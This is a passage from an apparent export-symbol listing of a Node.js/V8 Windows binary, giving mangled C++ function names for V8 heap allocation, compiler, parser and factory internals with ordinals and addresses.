                                  ?AllocateAliasedArguments@JSCreateLowering@compiler@internal@v8@@AEAAPEAVNode@234@PEAV5234@0000AEBVSharedFunctionInfoRef@234@PEA_N@Z27230x140f65850
                                  ?AllocateAliasedArguments@JSCreateLowering@compiler@internal@v8@@AEAAPEAVNode@234@PEAV5234@000AEBVSharedFunctionInfoRef@234@PEA_N@Z27240x140f65d50
                                  ?AllocateAlignedFrameSlots@Frame@compiler@internal@v8@@AEAAXH@Z27250x1404534a0
                                  ?AllocateAndInstallRequestedHeapObjects@Assembler@internal@v8@@AEAAXPEAVIsolate@23@@Z27260x1404a0ea0
                                  ?AllocateArguments@JSCreateLowering@compiler@internal@v8@@AEAAPEAVNode@234@PEAV5234@00@Z27270x140f66580
                                  ?AllocateChunk@MemoryAllocator@internal@v8@@QEAAPEAVMemoryChunk@23@_K0W4Executability@23@PEAVSpace@23@@Z27280x1408d10f0
                                  ?AllocateData@ControlEquivalence@compiler@internal@v8@@AEAAXPEAVNode@234@@Z27290x140fb58d0
                                  ?AllocateDeferredConstantPoolEntry@BytecodeArrayBuilder@interpreter@internal@v8@@QEAA_KXZ27300x14088f2f0
                                  ?AllocateElements@JSCreateLowering@compiler@internal@v8@@AEAAPEAVNode@234@PEAV5234@0W4ElementsKind@34@AEBV?$vector@PEAVNode@compiler@internal@v8@@V?$allocator@PEAVNode@compiler@internal@v8@@@std@@@std@@W4AllocationType@34@@Z27310x140f66950
                                  ?AllocateElements@JSCreateLowering@compiler@internal@v8@@AEAAPEAVNode@234@PEAV5234@0W4ElementsKind@34@HW4AllocationType@34@@Z27320x140f66c20
                                  ?AllocateEntry@V8HeapExplorer@internal@v8@@UEAAPEAVHeapEntry@23@PEAX@Z27330x1406db280
                                  ?AllocateEnvironmentThreadId@node@@YA?AUThreadId@1@XZ27340x140248a90
                                  ?AllocateExternalBackingStore@Heap@internal@v8@@QEAAPEAXAEBV?$function@$$A6APEAX_K@Z@std@@_K@Z27350x1409292c0
                                  ?AllocateFastLiteral@JSCreateLowering@compiler@internal@v8@@AEAAPEAVNode@234@PEAV5234@0VJSObjectRef@234@W4AllocationType@34@@Z27360x140f66ed0
                                  ?AllocateFastLiteralElements@JSCreateLowering@compiler@internal@v8@@AEAAPEAVNode@234@PEAV5234@0VJSObjectRef@234@W4AllocationType@34@@Z27370x140f67760
                                  ?AllocateHeapSlot@Scope@internal@v8@@AEAAXPEAVVariable@23@@Z27380x140a527e0
                                  ?AllocateInOldGenerationStubConstant@JSGraph@compiler@internal@v8@@QEAAPEAVNode@234@XZ27390x140ea6570
                                  ?AllocateInOldGenerationStubConstant@JSGraphAssembler@compiler@internal@v8@@QEAA?AV?$TNode@VCode@internal@v8@@@34@XZ27400x140ec2b90
                                  ?AllocateInRegion@DisjointAllocationPool@wasm@internal@v8@@QEAA?AVAddressRegion@base@4@_KV564@@Z27410x14056ea90
                                  ?AllocateInYoungGenerationStubConstant@JSGraph@compiler@internal@v8@@QEAAPEAVNode@234@XZ27420x140ea6600
                                  ?AllocateInYoungGenerationStubConstant@JSGraphAssembler@compiler@internal@v8@@QEAA?AV?$TNode@VCode@internal@v8@@@34@XZ27430x140ec2bf0
                                  ?AllocateIndex@ConstantArrayBuilder@interpreter@internal@v8@@AEAAIVEntry@1234@@Z27440x14086dda0
                                  ?AllocateIndexArray@ConstantArrayBuilder@interpreter@internal@v8@@AEAAIVEntry@1234@_K@Z27450x14086de10
                                  ?AllocateIndirectFunctions@WasmModuleBuilder@wasm@internal@v8@@QEAAII@Z27460x14052f1f0
                                  ?AllocateJumpTable@BytecodeArrayBuilder@interpreter@internal@v8@@QEAAPEAVBytecodeJumpTable@234@HH@Z27470x14088f300
                                  ?AllocateLargePage@LargeObjectSpace@internal@v8@@IEAAPEAVLargePage@23@HW4Executability@23@@Z27480x14091d2e0
                                  ?AllocateLinearly@PagedSpace@internal@v8@@IEAA?AVHeapObject@23@H@Z27490x14041a630
                                  ?AllocateLiteralRegExp@JSCreateLowering@compiler@internal@v8@@AEAAPEAVNode@234@PEAV5234@0VJSRegExpRef@234@@Z27500x140f67c30
                                  ?AllocateLocals@DeclarationScope@internal@v8@@QEAAXXZ27510x140a52810
                                  ?AllocateNonParameterLocal@Scope@internal@v8@@AEAAXPEAVVariable@23@@Z27520x140a52ab0
                                  ?AllocateNonParameterLocalsAndDeclaredGlobals@Scope@internal@v8@@AEAAXXZ27530x140a52b50
                                  ?AllocatePageSize@BoundedPageAllocator@base@v8@@UEAA_KXZ27540x140076c20
                                  ?AllocatePageSize@OS@base@v8@@CA_KXZ27550x140dc0640
                                  ?AllocatePageSize@PageAllocator@base@v8@@UEAA_KXZ27560x140076c50
                                  ?AllocatePageSize@internal@v8@@YA_KXZ27570x1405f3f30
                                  ?AllocatePages@BoundedPageAllocator@base@v8@@UEAAPEAXPEAX_K1W4Permission@PageAllocator@3@@Z27580x140dc9ec0
                                  ?AllocatePages@PageAllocator@base@v8@@UEAAPEAXPEAX_K1W4Permission@13@@Z27590x140dc8b10
                                  ?AllocatePages@internal@v8@@YAPEAXPEAVPageAllocator@2@PEAX_K2W4Permission@32@@Z27600x1405f3f50
                                  ?AllocatePagesAt@BoundedPageAllocator@base@v8@@QEAA_N_K0W4Permission@PageAllocator@3@@Z27610x140dc9fa0
                                  ?AllocateParameter@DeclarationScope@internal@v8@@AEAAXPEAVVariable@23@H@Z27620x140a52d60
                                  ?AllocateParameterLocals@DeclarationScope@internal@v8@@QEAAXXZ27630x140a52e40
                                  ?AllocateRaw@?$FactoryBase@VFactory@internal@v8@@@internal@v8@@AEAA?AVHeapObject@23@HW4AllocationType@23@W4AllocationAlignment@23@@Z27640x140955280
                                  ?AllocateRaw@?$FactoryBase@VOffThreadFactory@internal@v8@@@internal@v8@@AEAA?AVHeapObject@23@HW4AllocationType@23@W4AllocationAlignment@23@@Z27650x1409552a0
                                  ?AllocateRaw@CodeLargeObjectSpace@internal@v8@@QEAA?AVAllocationResult@23@H@Z27660x14091d370
                                  ?AllocateRaw@Factory@internal@v8@@AEAA?AVHeapObject@23@HW4AllocationType@23@W4AllocationAlignment@23@@Z27670x140943ac0
                                  ?AllocateRaw@NewLargeObjectSpace@internal@v8@@QEAA?AVAllocationResult@23@H@Z27680x14091d390
                                  ?AllocateRaw@NewSpace@internal@v8@@QEAA?AVAllocationResult@23@HW4AllocationAlignment@23@W4AllocationOrigin@23@@Z27690x14041a650
                                  ?AllocateRaw@OffThreadFactory@internal@v8@@AEAA?AVHeapObject@23@HW4AllocationType@23@W4AllocationAlignment@23@@Z27700x1408e4790
                                  ?AllocateRaw@OffThreadHeap@internal@v8@@QEAA?AVHeapObject@23@HW4AllocationType@23@W4AllocationAlignment@23@@Z27710x1408e34c0
                                  ?AllocateRaw@OffThreadLargeObjectSpace@internal@v8@@QEAA?AVAllocationResult@23@H@Z27720x14091d4f0
                                  ?AllocateRaw@OldLargeObjectSpace@internal@v8@@QEAA?AVAllocationResult@23@H@Z27730x14091d780
                                  ?AllocateRaw@PagedSpace@internal@v8@@QEAA?AVAllocationResult@23@HW4AllocationAlignment@23@W4AllocationOrigin@23@@Z27740x14041a710
                                  ?AllocateRaw@SimplifiedOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@VType@234@W4AllocationType@34@W4AllowLargeObjects@34@@Z27750x140ebb9d0
                                  ?AllocateRawAligned@NewSpace@internal@v8@@QEAA?AVAllocationResult@23@HW4AllocationAlignment@23@W4AllocationOrigin@23@@Z27760x14041a7c0
                                  ?AllocateRawAligned@PagedSpace@internal@v8@@QEAA?AVAllocationResult@23@HW4AllocationAlignment@23@W4AllocationOrigin@23@@Z27770x14041a8b0
                                  ?AllocateRawArray@?$FactoryBase@VFactory@internal@v8@@@internal@v8@@IEAA?AVHeapObject@23@HW4AllocationType@23@@Z27780x1409552c0
                                  ?AllocateRawArray@?$FactoryBase@VOffThreadFactory@internal@v8@@@internal@v8@@IEAA?AVHeapObject@23@HW4AllocationType@23@@Z27790x140955350
                                  ?AllocateRawFixedArray@?$FactoryBase@VFactory@internal@v8@@@internal@v8@@IEAA?AVHeapObject@23@HW4AllocationType@23@@Z27800x1409553e0
                                  ?AllocateRawFixedArray@?$FactoryBase@VOffThreadFactory@internal@v8@@@internal@v8@@IEAA?AVHeapObject@23@HW4AllocationType@23@@Z27810x140955420
                                  ?AllocateRawOneByteInternalizedString@?$FactoryBase@VFactory@internal@v8@@@internal@v8@@QEAA?AV?$Handle@VSeqOneByteString@internal@v8@@@23@HI@Z27820x140955460
                                  ?AllocateRawOneByteInternalizedString@?$FactoryBase@VOffThreadFactory@internal@v8@@@internal@v8@@QEAA?AV?$Handle@VSeqOneByteString@internal@v8@@@23@HI@Z27830x140955560
                                  ?AllocateRawSynchronized@NewSpace@internal@v8@@QEAA?AVAllocationResult@23@HW4AllocationAlignment@23@W4AllocationOrigin@23@@Z27840x14041aa20
                                  ?AllocateRawTwoByteInternalizedString@?$FactoryBase@VFactory@internal@v8@@@internal@v8@@QEAA?AV?$Handle@VSeqTwoByteString@internal@v8@@@23@HI@Z27850x140955640
                                  ?AllocateRawTwoByteInternalizedString@?$FactoryBase@VOffThreadFactory@internal@v8@@@internal@v8@@QEAA?AV?$Handle@VSeqTwoByteString@internal@v8@@@23@HI@Z27860x140955730
                                  ?AllocateRawUnaligned@NewSpace@internal@v8@@QEAA?AVAllocationResult@23@HW4AllocationOrigin@23@@Z27870x14041ab00
                                  ?AllocateRawUnaligned@PagedSpace@internal@v8@@QEAA?AVAllocationResult@23@HW4AllocationOrigin@23@@Z27880x14041abc0
                                  ?AllocateRawWeakArrayList@?$FactoryBase@VFactory@internal@v8@@@internal@v8@@IEAA?AVHeapObject@23@HW4AllocationType@23@@Z27890x140955810
                                  ?AllocateRawWeakArrayList@?$FactoryBase@VOffThreadFactory@internal@v8@@@internal@v8@@IEAA?AVHeapObject@23@HW4AllocationType@23@@Z27900x140955850
                                  ?AllocateRawWithAllocationSite@Factory@internal@v8@@AEAA?AVHeapObject@23@V?$Handle@VMap@internal@v8@@@23@W4AllocationType@23@V?$Handle@VAllocationSite@internal@v8@@@23@@Z27910x140943af0
                                  ?AllocateRawWithImmortalMap@?$FactoryBase@VFactory@internal@v8@@@internal@v8@@IEAA?AVHeapObject@23@HW4AllocationType@23@VMap@23@W4AllocationAlignment@23@@Z27920x140955890
                                  ?AllocateRawWithImmortalMap@?$FactoryBase@VOffThreadFactory@internal@v8@@@internal@v8@@IEAA?AVHeapObject@23@HW4AllocationType@23@VMap@23@W4AllocationAlignment@23@@Z27930x1409558c0
                                  ?AllocateReceiver@DeclarationScope@internal@v8@@QEAAXXZ27940x140a53080
                                  ?AllocateRegion@RegionAllocator@base@v8@@QEAA_KPEAVRandomNumberGenerator@23@_K@Z27950x140dca890
                                  ?AllocateRegion@RegionAllocator@base@v8@@QEAA_K_K@Z27960x140dca930
                                  ?AllocateRegionAt@RegionAllocator@base@v8@@QEAA_N_K0@Z27970x140dca9c0
                                  ?AllocateRegister@BytecodeRegisterOptimizer@interpreter@internal@v8@@AEAAXPEAVRegisterInfo@1234@@Z27980x140870da0
                                  ?AllocateRegistersForTesting@Pipeline@compiler@internal@v8@@SA_NPEBVRegisterConfiguration@34@PEAVInstructionSequence@234@_N@Z27990x140e7eda0
                                  ?AllocateRegularInOldGenerationStubConstant@JSGraph@compiler@internal@v8@@QEAAPEAVNode@234@XZ28000x140ea6690
                                  ?AllocateRegularInOldGenerationStubConstant@JSGraphAssembler@compiler@internal@v8@@QEAA?AV?$TNode@VCode@internal@v8@@@34@XZ28010x140ec2c50
                                  ?AllocateRegularInYoungGenerationStubConstant@JSGraph@compiler@internal@v8@@QEAAPEAVNode@234@XZ28020x140ea6720
                                  ?AllocateRegularInYoungGenerationStubConstant@JSGraphAssembler@compiler@internal@v8@@QEAA?AV?$TNode@VCode@internal@v8@@@34@XZ28030x140ec2cb0
                                  ?AllocateReservedEntry@ConstantArrayBuilder@interpreter@internal@v8@@AEAAIVSmi@34@@Z28040x14086deb0
                                  ?AllocateRestArguments@JSCreateLowering@compiler@internal@v8@@AEAAPEAVNode@234@PEAV5234@00H@Z28050x140f67ff0
                                  ?AllocateSavedCalleeRegisterSlots@Frame@compiler@internal@v8@@QEAAXH@Z28060x1404534d0
                                  ?AllocateSegment@AccountingAllocator@internal@v8@@UEAAPEAVSegment@23@_K@Z28070x140515290
                                  ?AllocateSourceRangeMap@ParseInfo@internal@v8@@QEAAXXZ28080x140739b40
                                  ?AllocateSpillSlot@Frame@compiler@internal@v8@@QEAAHHH@Z28090x1404534e0
                                  ?AllocateStackSlot@Scope@internal@v8@@AEAAXPEAVVariable@23@@Z28100x140a53170
                                  ?AllocateStackSpace@TurboAssembler@internal@v8@@QEAAXH@Z28110x140496e90
                                  ?AllocateStackSpace@TurboAssembler@internal@v8@@QEAAXVRegister@23@@Z28120x140496fa0
                                  ?AllocateVariables@DeclarationScope@internal@v8@@AEAA_NPEAVParseInfo@23@@Z28130x140a531d0
                                  ?AllocateVariablesRecursively@Scope@internal@v8@@AEAAXXZ28140x140a53290
                                  ?AllocateWasmMemory@BackingStore@internal@v8@@SA?AV?$unique_ptr@VBackingStore@internal@v8@@U?$default_delete@VBackingStore@internal@v8@@@std@@@std@@PEAVIsolate@23@_K1W4SharedFlag@23@@Z28150x14083e720
                                  ?AllocatedSinceLastGC@NewSpace@internal@v8@@QEAA_KXZ28160x1404218c0
                                  ?AllocationBase@Contents@ArrayBuffer@v8@@QEBAPEAXXZ28170x140076c20
                                  ?AllocationBase@Contents@SharedArrayBuffer@v8@@QEBAPEAXXZ28180x140076c20
                                  ?AllocationLength@Contents@ArrayBuffer@v8@@QEBA_KXZ28190x140076c30
                                  ?AllocationLength@Contents@SharedArrayBuffer@v8@@QEBA_KXZ28200x140076c30
                                  ?AllocationMode@Contents@ArrayBuffer@v8@@QEBA?AW40Allocator@23@XZ28210x140076c40
                                  ?AllocationMode@Contents@SharedArrayBuffer@v8@@QEBA?AW40Allocator@ArrayBuffer@3@XZ28220x140076c40
                                  ?AllocationObserversActive@Space@internal@v8@@IEAA_NXZ28230x140421960
                                  ?AllocationStep@Space@internal@v8@@QEAAXH_KH@Z28240x1408d1660
                                  ?AllocationStepAfterMerge@Space@internal@v8@@QEAAX_KH@Z28250x1408d1710
                                  ?AllocationThroughputInBytesPerMillisecond@GCTracer@internal@v8@@QEBANN@Z28260x14093f710
                                  ?AllocatorLimitOnMaxOldGenerationSize@Heap@internal@v8@@SA_KXZ28270x140929aa0
                                  ?AllowCodeGenerationFromStrings@Context@v8@@QEAAX_N@Z28280x140a79630
                                  ?AllowVarArgs@CallInterfaceDescriptor@internal@v8@@QEBA_NXZ28290x140459430
                                  ?AllowWasmCodeGenerationCallback@node@@YA_NV?$Local@VContext@v8@@@v8@@V?$Local@VString@v8@@@3@@Z28300x140248bd0
                                  ?AllowsLazyCompilation@DeclarationScope@internal@v8@@QEBA_NXZ28310x140a532f0
                                  ?AllowsLazyParsingWithoutUnresolvedVariables@Parser@internal@v8@@AEBA_NXZ28320x1406f9100
                                  ?AllowsLazyParsingWithoutUnresolvedVariables@Scope@internal@v8@@QEBA_NPEBV123@@Z28330x140a53310
                                  ?Ambiguous@ReasonEnum@Paused@API@Debugger@protocol@v8_inspector@@3PEBDEB28340x141cdcc30
                                  ?Analyze@BytecodeAnalysis@compiler@internal@v8@@AEAAXXZ28350x140e9f930
                                  ?Analyze@DeclarationScope@internal@v8@@SA_NPEAVParseInfo@23@@Z28360x140a53340
                                  ?AnalyzeLoopAssignmentForTesting@wasm@internal@v8@@YAPEAVBitVector@23@PEAVZone@23@_KPEBE2@Z28370x1405afc70
                                  ?AnalyzePartially@DeclarationScope@internal@v8@@QEAAXPEAVParser@23@PEAVAstNodeFactory@23@_N@Z28380x140a53470
                                  ?AnalyzePartially@Scope@internal@v8@@AEAAXPEAVDeclarationScope@23@PEAVAstNodeFactory@23@PEAV?$ThreadedListBase@VVariableProxy@internal@v8@@UEmptyBase@base@3@UUnresolvedNext@123@@base@3@_N@Z28390x140a535c0
                                  ?AnnotateStrongRetainer@GlobalHandles@internal@v8@@SAXPEA_KPEBD@Z28400x140076d60
                                  ?AnnotateStrongRetainer@V8@v8@@CAXPEA_KPEBD@Z28410x140a79710
                                  ?Any@FieldType@internal@v8@@SA?AV?$Handle@VFieldType@internal@v8@@@23@PEAVIsolate@23@@Z28420x1407f4bf0
                                  ?Any@Type@compiler@internal@v8@@SA?AV1234@XZ28430x140459440
                                  ?ApiGetter@CodeFactory@internal@v8@@SA?AVCallable@23@PEAVIsolate@23@@Z28440x1409f8d00
                                  ?AppendAsTraceFormat@TracedValue@tracing@v8@@UEBAXPEAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z28450x1405f5160
                                  ?AppendBoolean@TracedValue@tracing@v8@@QEAAX_N@Z28460x1405f5220
                                  ?AppendDeoptimizeArguments@InstructionSelector@compiler@internal@v8@@AEAAXPEAV?$ZoneVector@VInstructionOperand@compiler@internal@v8@@@34@W4DeoptimizeKind@34@W4DeoptimizeReason@34@AEBUFeedbackSource@234@PEAVNode@234@@Z28470x140e35100
                                  ?AppendDouble@TracedValue@tracing@v8@@QEAAXN@Z28480x1405f52b0
                                  ?AppendIfFastOrUseFull@LayoutDescriptor@internal@v8@@SA?AV?$Handle@VLayoutDescriptor@internal@v8@@@23@PEAVIsolate@23@V?$Handle@VMap@internal@v8@@@23@VPropertyDetails@23@V423@@Z28490x1407a1db0
                                  ?AppendInput@Node@compiler@internal@v8@@QEAAXPEAVZone@34@PEAV1234@@Z28500x140e317b0
                                  ?AppendInteger@TracedValue@tracing@v8@@QEAAXH@Z28510x1405f5390
                                  ?AppendNaryOperationSourceRange@Parser@internal@v8@@AEAAXPEAVNaryOperation@23@AEBUSourceRange@23@@Z28520x1406f9140
                                  ?AppendPhiInput@RawMachineAssembler@compiler@internal@v8@@QEAAXPEAVNode@234@0@Z28530x140ee14c0
                                  ?AppendString@TracedValue@tracing@v8@@QEAAXAEBV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z28540x140421980
                                  ?AppendString@TracedValue@tracing@v8@@QEAAXPEBD@Z28550x1405f5470
                                  ?AppendUse@Node@compiler@internal@v8@@AEAAXPEAUUse@1234@@Z28560x140e31a00
                                  ?Apply@BookmarkScope@Scanner@internal@v8@@QEAAXXZ28570x1406eace0
                                  ?ApplyBreakPoints@Debug@internal@v8@@AEAAXV?$Handle@VDebugInfo@internal@v8@@@23@@Z28580x1409be120
                                  ?ApplyDebugBreak@BytecodeArrayAccessor@interpreter@internal@v8@@QEAAXXZ28590x14089a960
                                  ?ApplyForwarding@JumpThreading@compiler@internal@v8@@SAXPEAVZone@34@AEBV?$ZoneVector@VRpoNumber@compiler@internal@v8@@@34@PEAVInstructionSequence@234@@Z28600x140ee65e0
                                  ?ApplyPersistentHandleVisitor@GlobalHandles@internal@v8@@AEAAXPEAVPersistentHandleVisitor@3@PEAVNode@123@@Z28610x140964b60
                                  ?ApplySideEffectChecks@Debug@internal@v8@@QEAAXV?$Handle@VDebugInfo@internal@v8@@@23@@Z28620x1409be2b0
                                  ?ApplyTransitionToDataProperty@LookupIterator@internal@v8@@QEAAXV?$Handle@VJSReceiver@internal@v8@@@23@@Z28630x14079c220
                                  ?ArchiveDebug@Debug@internal@v8@@QEAAPEADPEAD@Z28640x1409be340
                                  ?ArchiveSpacePerThread@Debug@internal@v8@@SAHXZ28650x1400dcfe0
                                  ?ArchiveSpacePerThread@Isolate@internal@v8@@SAHXZ28660x140421990
                                  ?ArchiveSpacePerThread@StackGuard@internal@v8@@SAHXZ28670x1400b48e0
                                  ?ArchiveStackGuard@StackGuard@internal@v8@@QEAAPEADPEAD@Z28680x14096c6d0
                                  ?ArchiveThread@Isolate@internal@v8@@QEAAPEADPEAD@Z28690x14097a320
                                  ?AreAliases@RegisterConfiguration@internal@v8@@QEBA_NW4MachineRepresentation@23@H0H@Z28700x1409db7d0
                                  ?AreContiguous@Register@interpreter@internal@v8@@SA_NV1234@0000@Z28710x1408706e0
                                  ?AreKeysEqual@StateValuesCache@compiler@internal@v8@@CA_NPEAX0@Z28720x140ea7e20
                                  ?AreMovesRedundant@Instruction@compiler@internal@v8@@QEBA_NXZ28730x140e04400
                                  ?AreSourcePositionsAvailable@FrameSummary@internal@v8@@QEBA_NXZ28740x140988e50
                                  ?AreSourcePositionsAvailable@SharedFunctionInfo@internal@v8@@QEBA_NXZ28750x14076dc60
                                  ?AreValid@CompilationDependencies@compiler@internal@v8@@QEBA_NXZ28760x140f0e8e0
                                  ?AreValueKeysEqual@StateValuesCache@compiler@internal@v8@@CA_NPEAUStateValuesKey@1234@0@Z28770x140ea7e60
                                  ?AreWasmThreadsEnabled@Isolate@internal@v8@@QEAA_NV?$Handle@VContext@internal@v8@@@23@@Z28780x14097a3b0
                                  ?AreaSize@PagedSpace@internal@v8@@QEAAHXZ28790x14041ac80
                                  ?ArgumentAdaptor@CodeFactory@internal@v8@@SA?AVCallable@23@PEAVIsolate@23@@Z28800x1409f8d20
                                  ?ArgumentCount@CFunction@v8@@QEBAIXZ28810x140131390
                                  ?ArgumentInfo@CFunction@v8@@QEBAAEBVCTypeInfo@2@I@Z28820x140437420
                                  ?ArgumentStackSlotsForCFunctionCall@TurboAssembler@internal@v8@@QEAAHH@Z28830x140497100
                                  ?Arguments@AsmFunctionType@wasm@internal@v8@@QEBA?BV?$ZoneVector@PEAVAsmType@wasm@internal@v8@@@34@XZ28840x140a62c60
                                  ?ArgumentsElementsState@CommonOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@W4CreateArgumentsType@34@@Z28850x140e094a0
                                  ?ArgumentsFrame@SimplifiedOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ28860x140ebbad0
                                  ?ArgumentsLength@SimplifiedOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@H_N@Z28870x140ebbae0
                                  ?ArgumentsLengthState@CommonOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@W4CreateArgumentsType@34@@Z28880x140e09540
                                  ?Arguments_string@Factory@internal@v8@@QEAA?AV?$Handle@VString@internal@v8@@@23@XZ28890x1404219a0
                                  ?Arguments_string@OffThreadFactory@internal@v8@@QEAA?AV?$Handle@VString@internal@v8@@@23@XZ28900x1407275f0
                                  ?Array@Type@compiler@internal@v8@@SA?AV1234@XZ28910x140459450
                                  ?ArrayBuffer_string@Factory@internal@v8@@QEAA?AV?$Handle@VString@internal@v8@@@23@XZ28920x1404219b0
                                  ?ArrayBuffer_string@OffThreadFactory@internal@v8@@QEAA?AV?$Handle@VString@internal@v8@@@23@XZ28930x140727600
                                  ?ArrayConstructorStubConstant@JSGraph@compiler@internal@v8@@QEAAPEAVNode@234@XZ28940x140ea67b0
                                  ?ArrayIterator_string@Factory@internal@v8@@QEAA?AV?$Handle@VString@internal@v8@@@23@XZ28950x1404219c0
                                  ?ArrayIterator_string@OffThreadFactory@internal@v8@@QEAA?AV?$Handle@VString@internal@v8@@@23@XZ28960x140727610
                                  ?ArrayLiteralFromListWithSpread@Parser@internal@v8@@AEAAPEAVArrayLiteral@23@AEBV?$ScopedList@PEAVExpression@internal@v8@@PEAX@23@@Z28970x14072aec0
                                  ?ArrayNoArgumentConstructor@CodeFactory@internal@v8@@SA?AVCallable@23@PEAVIsolate@23@W4ElementsKind@23@W4AllocationSiteOverrideMode@23@@Z28980x1409f8d40
                                  ?ArrayOrOtherObject@Type@compiler@internal@v8@@SA?AV1234@XZ28990x140459460
                                  ?ArrayOrProxy@Type@compiler@internal@v8@@SA?AV1234@XZ29000x140459470
                                  ?ArraySingleArgumentConstructor@CodeFactory@internal@v8@@SA?AVCallable@23@PEAVIsolate@23@W4ElementsKind@23@W4AllocationSiteOverrideMode@23@@Z29010x1409f8e70
                                  ?Array_string@Factory@internal@v8@@QEAA?AV?$Handle@VString@internal@v8@@@23@XZ29020x1404219d0
                                  ?Array_string@OffThreadFactory@internal@v8@@QEAA?AV?$Handle@VString@internal@v8@@@23@XZ29030x140727620
                                  ?AsAccessorInfo@ObjectRef@compiler@internal@v8@@QEBA?AVAccessorInfoRef@234@XZ29040x140dd7f50
                                  ?AsAllocationSite@ObjectRef@compiler@internal@v8@@QEBA?AVAllocationSiteRef@234@XZ29050x140dd8140
                                  ?AsArray@Map@v8@@QEBA?AV?$Local@VArray@v8@@@2@XZ29060x140a79870
                                  ?AsArray@Set@v8@@QEBA?AV?$Local@VArray@v8@@@2@XZ29070x140a79980
                                  ?AsArrayBoilerplateDescription@ObjectRef@compiler@internal@v8@@QEBA?AVArrayBoilerplateDescriptionRef@234@XZ29080x140dd8290
                                  ?AsBigInt@ObjectRef@compiler@internal@v8@@QEBA?AVBigIntRef@234@XZ29090x140dd82d0
                                  ?AsBitset@Type@compiler@internal@v8@@AEBAIXZ29100x140459480
                                  ?AsBitsetForTesting@Type@compiler@internal@v8@@QEAAIXZ29110x140459480
                                  ?AsBytecodeArray@ObjectRef@compiler@internal@v8@@QEBA?AVBytecodeArrayRef@234@XZ29120x140dd84c0
                                  ?AsCallHandlerInfo@ObjectRef@compiler@internal@v8@@QEBA?AVCallHandlerInfoRef@234@XZ29130x140dd85d0
                                  ?AsCallableType@AsmType@wasm@internal@v8@@QEAAPEAVAsmCallableType@234@XZ29140x140a62d20
                                  ?AsCell@ObjectRef@compiler@internal@v8@@QEBA?AVCellRef@234@XZ29150x140dd86b0
                                  ?AsClassScope@Scope@internal@v8@@QEAAPEAVClassScope@23@XZ29160x1400769f0
                                  ?AsClassScope@Scope@internal@v8@@QEBAPEBVClassScope@23@XZ29170x1400769f0
                                  ?AsCode@ObjectRef@compiler@internal@v8@@QEBA?AVCodeRef@234@XZ29180x140dd8790
                                  ?AsContext@ObjectRef@compiler@internal@v8@@QEBA?AVContextRef@234@XZ29190x140dd8870
                                  ?AsDeclarationScope@Scope@internal@v8@@QEAAPEAVDeclarationScope@23@XZ29200x1400769f0
                                  ?AsDeclarationScope@Scope@internal@v8@@QEBAPEBVDeclarationScope@23@XZ29210x1400769f0
                                  ?AsDescriptorArray@ObjectRef@compiler@internal@v8@@QEBA?AVDescriptorArrayRef@234@XZ29220x140dd88b0
                                  ?AsDouble@AsmJsScanner@internal@v8@@QEBANXZ29230x140a66a10
                                  ?AsElementsKind@Map@internal@v8@@SA?AV?$Handle@VMap@internal@v8@@@23@PEAVIsolate@23@V423@W4ElementsKind@23@@Z29240x14078f320
                                  ?AsElementsKind@MapRef@compiler@internal@v8@@QEBA?AV?$Optional@VMapRef@compiler@internal@v8@@@base@4@W4ElementsKind@34@@Z29250x140dd8a30
                                  ?AsFeedbackCell@ObjectRef@compiler@internal@v8@@QEBA?AVFeedbackCellRef@234@XZ29260x140dd8e30
                                  ?AsFeedbackVector@ObjectRef@compiler@internal@v8@@QEBA?AVFeedbackVectorRef@234@XZ29270x140dd8f10
                                  ?AsFixedArray@ObjectRef@compiler@internal@v8@@QEBA?AVFixedArrayRef@234@XZ29280x140dd9000
                                  ?AsFixedArrayBase@ObjectRef@compiler@internal@v8@@QEBA?AVFixedArrayBaseRef@234@XZ29290x140dd90f0
                                  ?AsFixedDoubleArray@ObjectRef@compiler@internal@v8@@QEBA?AVFixedDoubleArrayRef@234@XZ29300x140dd91d0
                                  ?AsFunctionTemplateInfo@ObjectRef@compiler@internal@v8@@QEBA?AVFunctionTemplateInfoRef@234@XZ29310x140dd93c0
                                  ?AsFunctionType@AsmCallableType@wasm@internal@v8@@UEAAPEAVAsmFunctionType@234@XZ29320x140077dc0
                                  ?AsFunctionType@AsmFunctionType@wasm@internal@v8@@UEAAPEAV1234@XZ29330x1400769f0
                                  ?AsFunctionType@AsmType@wasm@internal@v8@@QEAAPEAVAsmFunctionType@234@XZ29340x140a62d40
                                  ?AsHandle@StringTableShape@internal@v8@@SA?AV?$Handle@VObject@internal@v8@@@23@PEAVIsolate@23@PEAVStringTableKey@23@@Z29350x1404219e0
                                  ?AsHeapConstant@Type@compiler@internal@v8@@QEBAPEBVHeapConstantType@234@XZ29360x1400769d0
                                  ?AsHeapNumber@ObjectRef@compiler@internal@v8@@QEBA?AVHeapNumberRef@234@XZ29370x140dd9430
                                  ?AsHeapObject@ObjectRef@compiler@internal@v8@@QEBA?AVHeapObjectRef@234@XZ29380x140dd95f0
                                  ?AsIdentifier@Parser@internal@v8@@CAPEBVAstRawString@23@PEAVExpression@23@@Z29390x1406f91a0
                                  ?AsIdentifierExpression@Parser@internal@v8@@AEAAPEAVVariableProxy@23@PEAVExpression@23@@Z29400x1406f91d0
                                  ?AsInternalizedString@ObjectRef@compiler@internal@v8@@QEBA?AVInternalizedStringRef@234@XZ29410x140dd9660
                                  ?AsIterationStatement@Parser@internal@v8@@AEAAPEAVIterationStatement@23@PEAVBreakableStatement@23@@Z29420x1406f91f0
                                  ?AsJSArray@ObjectRef@compiler@internal@v8@@QEBA?AVJSArrayRef@234@XZ29430x140dd9850
                                  ?AsJSBoundFunction@ObjectRef@compiler@internal@v8@@QEBA?AVJSBoundFunctionRef@234@XZ29440x140dd9930
                                  ?AsJSDataView@ObjectRef@compiler@internal@v8@@QEBA?AVJSDataViewRef@234@XZ29450x140dd9b20
                                  ?AsJSFunction@ObjectRef@compiler@internal@v8@@QEBA?AVJSFunctionRef@234@XZ29460x140dd9d10
                                  ?AsJSGlobalObject@ObjectRef@compiler@internal@v8@@QEBA?AVJSGlobalObjectRef@234@XZ29470x140dd9df0
                                  ?AsJSGlobalProxy@ObjectRef@compiler@internal@v8@@QEBA?AVJSGlobalProxyRef@234@XZ29480x140dd9e30
